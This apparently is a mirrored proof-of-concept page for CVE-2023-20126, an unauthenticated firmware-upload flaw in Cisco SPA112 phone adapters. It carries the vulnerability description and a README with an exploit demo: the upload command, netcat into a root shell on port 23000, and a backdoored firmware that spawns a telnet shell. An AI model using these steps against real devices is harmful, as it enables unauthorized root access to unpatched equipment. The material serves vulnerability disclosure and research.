Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2023-20126 PoC — Cisco SPA112 2-Port Phone Adapters Remote Command Execution Vulnerability

Source
https://github.com/fullspectrumdev/RancidCrisco
Associated Vulnerability
Title:Cisco SPA112 2-Port Phone Adapters Remote Command Execution Vulnerability (CVE-2023-20126)
Description:A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability.
Description
PoC for CVE-2023-20126
Readme
# RancidCrisco
Minimum Viable PoC for CVE-2023-20126

This is the initial release. It works, but its the 'simplest case' exploit.

Tested and working on SPA112/SPA122 - SPA232D requires a different firmware image. 

Gives a root-shell on port 23000/tcp.

I still need to clean up the toolchain used for editing the firmware and will probably put that in a different repo. It is mostly based on the work of @BigNerd95, but with minor alterations to work on the SPA112/122 firmware files.

## Demo.

```
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin 
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.

< wait a few mins, nervously > 

$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????


BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
```

## Files

- fwupload.py - firmware image uploader that bypasses auth by simply not sending any, exploiting CVE-2023-20126. takes two arguments: URL of the devices Web UI, and firmware file to upload.
- telnet-23000.bin - Proof of Concept malicious firmware image that spawns `telnetd -l /bin/sh -p 23000`, giving a root shell on port 23000/tcp. Based on work by bignerd95.

## Licence
WTFPL.

## Bugs
use git issue. 

## Disclaimer
If this bricks your fucking device, I don't take any responsibility.   
That is YOUR problem.  
I mean, I hacked together that backdoored firmware in an evening.  
Also, why aren't you following the writeup and building your own backdoored firmware?
File Snapshot

 [4.0K]  /data/pocs/6cad69cce0ea6f379d2b0e93b0aef56e3cb7115e
├── [1.6K]  fwupload.py
├── [1.9K]  README.md
└── [ 10M]  telnet-23000.bin

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →